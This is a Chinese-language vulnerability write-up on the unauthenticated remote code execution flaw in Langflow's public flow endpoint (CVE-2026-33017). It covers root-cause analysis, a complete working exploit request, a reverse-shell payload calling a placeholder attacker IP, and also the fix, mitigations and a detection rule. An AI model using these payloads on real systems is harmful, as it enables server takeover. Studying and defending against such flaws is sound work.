Langflow_CVE-2026-33017_RCE_分析与复现
字数 3316
更新时间 2026-04-03 12:12:48

Langflow CVE-2026-33017 远程代码执行漏洞分析与复现教学文档

1. 漏洞概述

漏洞编号:CVE-2026-33017
漏洞类型:未授权远程代码执行 (Unauthenticated Remote Code Execution)
影响版本:Langflow 1.6.8 及之前版本
漏洞等级:高危
修复版本:Langflow 1.9.0
漏洞位置/api/v1/build_public_tmp/{flow_id}/flow 端点

2. 漏洞背景

Langflow 是一个用于构建和运行 LangChain 流程的低代码框架,提供了可视化界面。该漏洞存在于 Langflow 的"嵌入式公共流程"功能中,允许未经认证的攻击者通过构造特定的恶意请求,在服务端执行任意代码。

3. 漏洞原理详解

3.1 端点设计缺陷

Langflow 为支持"嵌入式公共流程"功能,提供了 build_public_tmp 端点,允许终端用户在不登录的情况下运行嵌入在第三方网站中的流程。该端点位于:

# langflow-1.6.8/src/backend/base/langflow/api/v1/chat.py
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,  # ← 攻击者可控
    request: Request,
    # 无 current_user 依赖注入 —— 任何请求者均可调用
):

关键问题

  1. 无认证检查:与同文件中需要认证的 build_flow() 端点不同,build_public_tmp 没有 current_user: CurrentActiveUser 依赖注入
  2. 可控的 data 参数:端点接受可选的 data 参数,允许调用方在请求体中携带完整的流程节点定义
  3. 数据无过滤:攻击者提供的 data 参数被不加过滤地直接传入后续构建函数

3.2 代码执行的根本原因

Langflow 支持用户编写自定义 Python 组件,后端在处理这类节点时存在安全缺陷:

# langflow-1.6.8/src/backend/base/langflow/utils/validate.py
def prepare_global_scope(module):
    exec_globals = globals().copy()  # 继承进程全局作用域
    
    # 阶段一:处理 import 语句(无模块白名单)
    for node in imports:
        module_obj = importlib.import_module(module_name) 
        exec_globals[variable_name] = module_obj
    
    # 阶段二:执行所有顶层定义语句
    if definitions:
        # ast.Assign / ast.ClassDef / ast.FunctionDef 均在此执行
        combined_module = ast.Module(body=definitions, type_ignores=[])
        compiled_code = compile(combined_module, "<string>", "exec")
        exec(compiled_code, exec_globals)  # 任意代码执行

关键细节

  • ast.Assign(赋值语句)被纳入 definitions 列表并立即执行
  • 这意味着形如 _x = os.system("id") 的顶层赋值在图构建阶段就已触发
  • 攻击者无需等待流程被"运行",服务端收到请求并解析节点结构时代码就已执行

3.3 默认配置加剧风险

Langflow 默认启用 AUTO_LOGIN=true,任何人可通过 /api/v1/auto_login 接口获取用户令牌,进而创建公开流程。这使得攻击者不需要预先知道目标的 Public Flow ID,可以完全自给自足地构造端到端利用链。

4. 漏洞利用链分析

4.1 Source-Sink 污点传播链

完整攻击链如下所示:

[Source] HTTP POST Body → data.nodes[].data.node.template.code.value
    │
    │ chat.py:549 build_public_tmp()
    │ 污点类型: FlowDataRequest (Pydantic model)
    │
    ▼ build.py:36 start_flow_build(data=data)
    │
    ▼ build.py:248 create_graph() 闭包
    │
    ▼ utils.py:161 build_graph_from_data(payload=dict)
    │
    ▼ graph/base.py:1100 Graph.from_payload(payload)
    │
    ▼ graph/base.py:235→485→1269 add_nodes_and_edges → _build_graph
    │
    ▼ graph/base.py:1317 _instantiate_components_in_vertices()
    │
    ▼ vertex/base.py:366 Vertex.instantiate_component()
    │
    ▼ loading.py:24 instantiate_class(vertex)
    │
    ▼ eval.py:9 eval_custom_component_code(code)
    │
    ▼ validate.py:242 create_class(code, class_name)
    │
    ▼ validate.py:302 prepare_global_scope(module)
    │
[Sink-1] validate.py:363 exec(compiled_code, exec_globals) ← 顶层赋值执行
[Sink-2] validate.py:408 exec(compiled_class, exec_globals) ← 类体定义执行

4.2 各层详细分析

Layer 0 — HTTP 请求入口

POST /api/v1/build_public_tmp/{flow_id}/flow HTTP/1.1
Content-Type: application/json
Cookie: client_id=attacker

{
    "data": {
        "nodes": [{
            "data": {
                "node": {
                    "template": {
                        "code": {
                            "value": "import os\n_r = os.system('id')\n..."  // 恶意代码
                        }
                    }
                }
            }
        }],
        "edges": []
    }
}

Layer 1-3 — 请求处理层

  • build_public_tmp(): 接收攻击者可控的 data 参数
  • start_flow_build(): 将 data 原样传递
  • create_graph(): 调用 data.model_dump() 转换为字典格式

Layer 4-5 — 图构建层

  • Graph.from_payload(): 从 payload 中提取 verticesedges
  • _build_graph(): 将攻击者定义的节点转换为 Vertex 对象
  • _build_vertex_params(): 将 template.code.value 写入 vertex.params["code"]

Layer 6-8 — 组件实例化层

  • instantiate_component(): 调用组件加载函数
  • instantiate_class(): 提取 custom_params.pop("code") 得到恶意代码字符串
  • eval_custom_component_code(): 将代码传递给验证函数

Layer 9-10 — 代码执行层

  • create_class(): 解析代码为 AST
  • prepare_global_scope(): 执行顶层定义语句
  • 关键点: ast.Assign 节点(赋值语句)被立即执行

5. Payload 构造逻辑

5.1 构造要求

攻击载荷需同时满足两个条件:

条件一:正确使用 ast.Assign 触发代码执行

prepare_global_scope() 函数只将三类节点收入 definitions 列表并执行:

# 实际源码
elif isinstance(node, ast.ClassDef | ast.FunctionDef | ast.Assign):
    definitions.append(node)

这意味着:

# 错误示例(会被跳过,不执行)
os.system("id")  # ast.Expr
_f.write(data)   # ast.Expr
_f.close()       # ast.Expr

# 正确示例(ast.Assign)
_r = os.system("id")  # 会被执行
# 链式赋值
_result = open("/tmp/out.txt", "w").write(os.popen("id").read())

条件二:包含合法 Component 骨架

exec() 执行后,Langflow 会扫描命名空间寻找 Component 子类,需要加入一个空骨架类保证后续流程不报错:

from langflow.custom import Component
from langflow.io import Output
from langflow.schema import Data

class Stub(Component):
    display_name = "X"
    outputs = [Output(display_name="O", name="o", method="r")]
    
    def r(self) -> Data:
        return Data(data={})

5.2 最终 Payload 结构

最终 Payload = 链式赋值(ast.Assign,命令执行) + Component 骨架(通过类型检查)

6. 漏洞复现实战

6.1 环境搭建

# 拉取存在漏洞的版本
docker pull langflowai/langflow:1.6.8

# 运行容器
docker run -d \
    --name langflow-vuln \
    -p 7860:7860 \
    langflowai/langflow:1.6.8

# 验证运行状态
docker ps | grep langflow-vuln

访问 http://127.0.0.1:7860 进入 Langflow 可视化界面。

6.2 创建 Public Flow

由于默认开启 AUTO_LOGIN=true,无需凭据即可获取用户令牌:

  1. 访问 /api/v1/auto_login 获取令牌
  2. 使用令牌创建公开流程
  3. 从响应中获取有效的 flow_id

注意:在真实攻击中,通常从目标公开分享的流程链接(URL 中含有 flow_id)直接获取 ID。

6.3 写文件验证 RCE

构造包含文件写入命令的 Payload:

# 恶意代码
import os
# 创建文件并写入命令执行结果
_r = open("/tmp/rce_test.txt", "w").write(os.popen("id && hostname").read())

# Component 骨架
from langflow.custom import Component
from langflow.io import Output
from langflow.schema import Data

class MaliciousComponent(Component):
    display_name = "Test"
    outputs = [Output(display_name="Out", name="out", method="run")]
    
    def run(self) -> Data:
        return Data(data={})

HTTP 请求示例

POST /api/v1/build_public_tmp/{flow_id}/flow HTTP/1.1
Host: 127.0.0.1:7860
Content-Type: application/json
Cookie: client_id=attacker_generated_id

{
    "data": {
        "nodes": [{
            "data": {
                "node": {
                    "template": {
                        "code": {
                            "value": "import os\n_r = open('/tmp/rce_test.txt', 'w').write(os.popen('id && hostname').read())\nfrom langflow.custom import Component\nfrom langflow.io import Output\nfrom langflow.schema import Data\nclass MaliciousComponent(Component):\n    display_name = 'Test'\n    outputs = [Output(display_name='Out', name='out', method='run')]\n    def run(self) -> Data:\n        return Data(data={})"
                        }
                    }
                }
            }
        }],
        "edges": []
    }
}

验证执行结果

# 在容器内检查
docker exec langflow-vuln cat /tmp/rce_test.txt
# 输出示例:
# uid=1000(user) gid=0(root) groups=0(root)
# d4ec27858e21

6.4 反弹 Shell

构造反弹 Shell 的 Payload:

import socket,subprocess,os
_s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
_s.connect(("attacker_ip", 4444))
os.dup2(_s.fileno(),0)
os.dup2(_s.fileno(),1)
os.dup2(_s.fileno(),2)
_p = subprocess.call(["/bin/sh","-i"])

from langflow.custom import Component
from langflow.io import Output
from langflow.schema import Data

class ReverseShellComponent(Component):
    display_name = "Shell"
    outputs = [Output(display_name="Out", name="out", method="execute")]
    
    def execute(self) -> Data:
        return Data(data={})

攻击者监听

# 在攻击机上
nc -lvp 4444

7. 漏洞修复方案

7.1 官方修复方案

在 Langflow 1.9.0 版本中,官方移除了 build_public_tmp 端点的 data 参数:

# 修复后(v1.9.0)
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,
    # data 参数已删除,仅保留 inputs(输入值覆盖)
    request: Request,
):
    ...
    await start_flow_build(
        flow_id=new_flow_id,
        data=None,  # 强制走数据库路径,攻击者无法注入节点定义
        inputs=inputs,
        ...
    )

修复效果

  • 切断了污点传播链的入口
  • 即使端点维持无认证状态,攻击者也无法通过 data 参数注入自定义节点
  • exec() 只会执行数据库中可信的已有流程数据

7.2 临时缓解措施

对于无法立即升级的用户,可采取以下措施:

  1. 禁用 AUTO_LOGIN 功能

    # 启动时设置环境变量
    docker run -e AUTO_LOGIN=false ...
    
  2. 网络层防护

    • 限制 /api/v1/build_public_tmp 端点的访问来源
    • 配置 WAF 规则拦截可疑的代码注入请求
  3. 应用层防护

    • 在反向代理层添加认证
    • 监控异常的代码执行行为

8. 漏洞利用检测

8.1 攻击特征

  1. 请求路径POST /api/v1/build_public_tmp/{flow_id}/flow
  2. Content-Typeapplication/json
  3. 请求特征data.nodes[].data.node.template.code.value 字段包含:
    • 系统命令执行函数(os.systemsubprocessos.popen
    • 文件操作(openwrite
    • 网络连接(socket.connect

8.2 检测规则示例

# WAF/SIEM 检测规则
rule langflow_rce_attempt {
    meta:
        description = "检测 Langflow CVE-2026-33017 RCE 尝试"
        severity = "CRITICAL"
    
    http:
        method = "POST"
        path = "/api/v1/build_public_tmp/*/flow"
    
    content:
        "data.nodes" and 
        ("os.system" or "subprocess" or "os.popen" or "exec(" or "eval(")
    
    condition:
        http and content
}

9. 总结与安全建议

9.1 漏洞根本原因总结

  1. 认证缺失:公开端点缺少用户身份验证
  2. 输入验证不足:允许用户控制完整的流程节点定义
  3. 代码执行无沙箱exec() 在全局作用域执行,无任何限制
  4. 默认配置不安全AUTO_LOGIN=true 降低了攻击门槛

9.2 安全开发建议

  1. 最小权限原则:公开端点应限制功能,避免执行用户提供的代码
  2. 输入验证:对用户提供的代码进行严格的语法和语义检查
  3. 沙箱执行:使用受限的执行环境运行不可信代码
  4. 模块白名单:限制可导入的 Python 模块
  5. 审计日志:记录所有代码执行请求

9.3 应急响应步骤

  1. 立即升级到 Langflow 1.9.0 或更高版本
  2. 检查服务器是否有被入侵迹象
  3. 审查日志中是否有可疑的 /api/v1/build_public_tmp 请求
  4. 如发现入侵,进行全面的系统安全检查

注意:本教学文档仅供安全研究和防御使用,请勿用于非法用途。任何未经授权的系统测试和攻击行为都是违法的。

相似文章
相似文章
 全屏